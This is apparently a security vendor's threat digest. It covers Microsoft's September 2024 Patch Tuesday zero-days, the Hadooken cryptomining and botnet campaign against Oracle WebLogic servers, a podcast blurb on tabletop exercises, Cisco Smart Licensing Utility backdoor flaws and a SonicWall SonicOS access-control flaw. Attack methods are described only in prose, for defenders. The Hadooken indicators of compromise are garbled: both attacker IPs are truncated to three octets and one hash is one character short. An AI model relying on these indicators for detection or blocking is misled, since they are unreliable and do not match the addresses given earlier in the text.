Microsoft’s September 2024 Patch Tuesday release addresses 79 security vulnerabilities, including three actively exploited zero-day vulnerabilities and one publicly disclosed zero-day. The update also resolves 7 critical issues, involving either remote code execution (RCE) or privilege escalation.
The number of bugs in each vulnerability category is listed below:
30 Elevation of Privilege Vulnerabilities
4 Security Feature Bypass Vulnerabilities
23 Remote Code Execution Vulnerabilities
11 Information Disclosure Vulnerabilities
8 Denial of Service Vulnerabilities
3 Spoofing Vulnerabilities
Zero-day Vulnerabilities fixed:
Microsoft classifies a zero-day vulnerability as one that is either publicly disclosed or actively exploited while no official fix is available.
RISK SCORING
CVE-ID CVSSv3 Score
CVE-2024-38014 7.8
CVE-2024-38217 5.4
CVE-2024-38226 7.3
CVE-2024-43491 9.8
VULNERABILITY DETAILS
The three actively exploited zero-day vulnerabilities patched in last Tuesday’s updates are:
CVE-2024-38014 – Windows Installer Elevation of Privilege Vulnerability: This flaw allows attackers to gain SYSTEM privileges on Windows systems. Microsoft hasn’t provided details on how it was used in attacks.
CVE-2024-38217 – Windows Mark of the Web (MOTW) Security Bypass Vulnerability: Publicly disclosed by Joe Desimone of Elastic Security, this flaw has likely been exploited since 2018. Desimone’s report outlines ‘LNK stomping,’ a technique using specially crafted LNK files to bypass Smart App Control and MOTW security warnings, allowing malicious files to be opened without alerts.
CVE-2024-38226 – Microsoft Publisher Security Feature Bypass Vulnerability: This vulnerability allows attackers to bypass Office macro policies that block untrusted or malicious files. Microsoft has not revealed the source of this discovery or how it was exploited.
PUBLICLY DISCLOSED ZERO-DAY
CVE-2024-43491 – Microsoft Windows Update Remote Code Execution Vulnerability
This flaw in the servicing stack, though labeled as remote code execution, actually rolls back fixes for older vulnerabilities in certain Windows components. Specifically, it affects Windows 10 version 1507 (released in July 2015) and certain supported versions like Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB. Microsoft clarified that while the flaw reintroduces previously exploited vulnerabilities, there is no evidence it was known or exploited externally before being discovered internally by Microsoft. According to Microsoft’s advisory, systems that installed updates, including the March 2024 security update (KB5035858) through August 2024, were vulnerable to previously mitigated flaws being reintroduced in components such as Active Directory Lightweight Directory Services, Internet Explorer 11, and Windows Media Player.
RECOMMENDATIONS
Apply security patches to all affected systems.
CVE-2024-43491 is resolved by installing both the September 2024 Servicing Stack Update (KB5043936) and the September 2024 Windows security update (KB5043083) in-sequence.
A new malware campaign was recently identified that targets Linux environments, focusing on crypto-mining and botnet malware deployment. This operation specifically targets Oracle Weblogic servers to deliver a malware strain called “Hadooken,” as reported by cloud security firm Aqua. “When Hadooken is executed, it installs Tsunami malware and deploys a crypto miner.”
TECHNICAL DETAILS
Oracle WebLogic Server is an enterprise-level Java EE application server, widely used for building, deploying, and managing large-scale distributed applications. It is popular in banking, e-commerce, and critical business systems due to its support for Java, transaction management, and scalability. WebLogic is often targeted in cyberattacks, primarily due to vulnerabilities such as deserialization flaws, improper access controls, and common misconfigurations – examples include weak credentials or exposed admin consoles. These weaknesses can lead to severe risks, including remote code execution (RCE), privilege escalation, and data breaches, especially if systems are not properly patched or secured.
The recent attack campaign leverages these vulnerabilities and configuration weaknesses to gain an initial foothold and execute arbitrary code on vulnerable WebLogic instances. The attack begins by deploying two nearly identical payloads: one written in Python and the other as a shell script. These payloads retrieve the “Hadooken” malware from a remote server, with IP addresses “89.185.85[.]102” or “185.174.136[.]204.”
The shell script version is designed to search directories containing SSH data, including user credentials and host information using this data to launch attacks on other known servers. This enables lateral movement within the compromised environment, spreading Hadooken malware across the network or connected systems.
Hadooken itself consists of two primary components: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet named “Tsunami” (also known as Kaiten). Tsunami has previously targeted Jenkins and WebLogic services, especially in Kubernetes environments. Once deployed, Hadooken ensures persistence by creating cron jobs that run the crypto miner at regular intervals.
To evade detection, Hadooken employs various defense evasion techniques. It uses Base64-encoded payloads and disguises malicious processes by naming them innocuously as “bash” or “java” to blend with legitimate system activity. Additionally, it deletes artifacts and traces of its execution to avoid detection. The IP address 89.185.85[.]102 is associated with a hosting provider in Germany, Aeza International LTD (AS210644). A report from Uptycs in February 2024 linked this IP to the “8220 Gang”, which exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center for cryptocurrency mining. The same infrastructure is now implicated in the Hadooken campaign, reflecting a consistent trend in abusing known enterprise vulnerabilities.
INDICATORS OF COMPROMISE (IOCs)
Hashes:
cdf3fce392df6fbb3448c5d26c8d053e
4a12098c3799ce17d6d59df86ed1a5b6
b9f096559e923787ebb1288c93ce2902
9bea7389b633c331e706995ed4b3999c
8eef5aa6fa9859c71b55c1039f02d2e6
c1897ea9457343bd8e73f98a1d85a38f
249871cb1c396241c9fcd0fd8f9ad2ae
73d96a4316182cd6417bdab86d4df1f
Attacker IP:
174.136.204
185.85.102
RECOMMENDATIONS
Ensure that Oracle WebLogic servers are consistently updated with the latest security patches to close known vulnerabilities like deserialization flaws.
Use strong, unique credentials for all admin and user accounts, and disable unnecessary admin interfaces. Implement multi-factor authentication (MFA) where possible.
Regularly audit server configurations to identify misconfigurations such as exposed admin consoles and weak credentials. Limit access to sensitive areas like SSH directories.
Set up intrusion detection systems (IDS) to monitor unusual traffic, especially from known malicious IP addresses, such as those linked to the Hadooken campaign.
Restrict the privileges of user accounts and processes to minimize the impact of potential malware execution.
Install and maintain anti-malware tools on all systems to detect and block malicious activities, including crypto miners and botnets like Tsunami.
Automate the process of identifying and mitigating vulnerabilities using tools such as vulnerability scanners and patch management solutions.
Segment the network to prevent malware from easily moving laterally between systems. Use firewalls and access control lists (ACLs) to enforce boundaries.
Maintain comprehensive logging of all system and network activities to detect unusual behaviors, such as unauthorized SSH access or cron job creations.
Ensure regular backups of critical systems and test recovery plans to minimize data loss in the event of a malware attack or breach.
This episode of The Backup Wrap-up explores the vital role of tabletop exercises in cybersecurity preparedness. Dr. Mike Saylor, CEO of Blackswan Cybersecurity, offers an in-depth look at how to effectively plan and conduct these exercises. We discuss why these simulations are crucial for organizations of any size and how they can significantly enhance incident response capabilities.
Tune in to learn how to choose appropriate scenarios, engage key stakeholders, and foster a constructive learning environment. This podcast also highlights common mistakes to avoid and emphasizes the need for regular practice. Whether you’re just starting with tabletop exercises or aiming to refine your current approach, this episode delivers practical advice to boost your organization’s cyber resilience. Don’t miss out on this chance to elevate your incident response strategy!
Cisco recently addressed two critical vulnerabilities (CVE-2024-20439 and CVE-2024-20440) in the Cisco Smart Licensing Utility (CSLU), removing a backdoor administrative account and fixing an information disclosure flaw. These vulnerabilities could allow remote attackers the ability to gain unauthorized administrative access or retrieve sensitive data. Users are advised to update to the latest version to prevent exploitation.
RISK SCORE
CVE-ID CVSSv3 Score
CVE-2024-20439 9.8
CVE-2024-20440 9.8
VULNERABILITY DETAILS
CSLU is a Windows-based tool designed to manage licenses and associated products locally, without the need to connect to Cisco’s cloud-based Smart Software Manager.
The first flaw, CVE-2024-20439, involved a backdoor account that allowed unauthorized attackers to log in with administrative privileges using static, hardcoded credentials, through the API of the Cisco Smart Licensing Utility application. This vulnerability was particularly dangerous and allowed attackers to gain full access to systems remotely without authentication.
The second flaw, CVE-2024-20440, involved the exposure of sensitive log files containing API credentials, accessible through crafted HTTP requests. This vulnerability impacted only certain versions of the CSLU and posed a significant risk by leaking sensitive data that could be used in further attacks.
AFFECTED PRODUCTS
Cisco Smart License Utility 2.0.0, 2.1.0, and 2.2.0
REMEDIATION
Update to Cisco Smart License Utility 2.3.0 or later.
SonicWall’s self-disclosed critical security vulnerability in SonicOS is now under active exploitation. Available updates should be applied as soon as possible. The vulnerability (CVE-2024-40766) has a CVSS score of 9.3 out of 10 and stems from improper access control in the SonicOS management interface and SSLVPN, which could allow unauthorized access to resources and, under certain conditions, trigger a firewall crash.
TECHNICAL DETAILS
CVE-2024-40766 is a critical access control vulnerability with a CVSS v3 score of 9.3, affecting multiple generations of SonicWall Firewall devices, including Gen 5, Gen 6, and Gen 7 models. The flaw, initially disclosed on August 22, 2024, affects the management interface of SonicOS, but recent updates indicate it also impacts the SSLVPN feature. The vulnerability could allow unauthorized resource access and may also lead to firewall crashes.
AFFECTED DEVICES AND VERSIONS
SonicWall Gen 5 running SonicOS version 5.9.2.14-12o and older: Fixed in SonicOS version 5.9.2.14-13o.
SonicWall Gen 6 running SonicOS version 6.5.4.14-109n and older: Fixed in 6.5.2.8-2n (for SM9800, NSsp 12400, NSsp 12800) and 6.5.4.15-116n (for other Gen 6 firewalls).
SonicWall Gen 7 running SonicOS version 7.0.1-5035 and older: The issue is not reproducible in version 7.0.1-5035 and later.
SonicWall has not provided detailed technical information on how the vulnerability is exploited but highlights its potential to allow unauthorized access and cause firewall failures, which could leave corporate networks exposed. Given that SonicWall firewalls are often accessible via the internet for VPN services, they are prime targets for exploitation.
RECOMMENDATIONS
SonicWall’s critical steps for securing devices against CVE-2024-40766.
Restrict SonicOS management portal access to trusted sources only. Disabling internet access to the WAN management portal entirely can significantly reduce exposure.
Only allow SSLVPN access from trusted sources. If SSLVPN functionality is not required, disable it to further reduce attack surface.
For Gen 5 and Gen 6 devices, administrators should enforce immediate password changes for SSLVPN users with local accounts. The “User must change password” option should also be enabled for all local users.
Activate MFA for all SSLVPN users to add an additional layer of security. SonicWall supports MFA using Time-based One-Time Passwords (TOTP) or email-based OTPs, providing stronger protection against unauthorized access. Detailed configuration instructions for MFA are available on SonicWall’s support portal.
Ensure that all affected devices are running the latest patched firmware versions as outlined above. Regularly check for firmware updates and apply them promptly to mitigate known vulnerabilities.
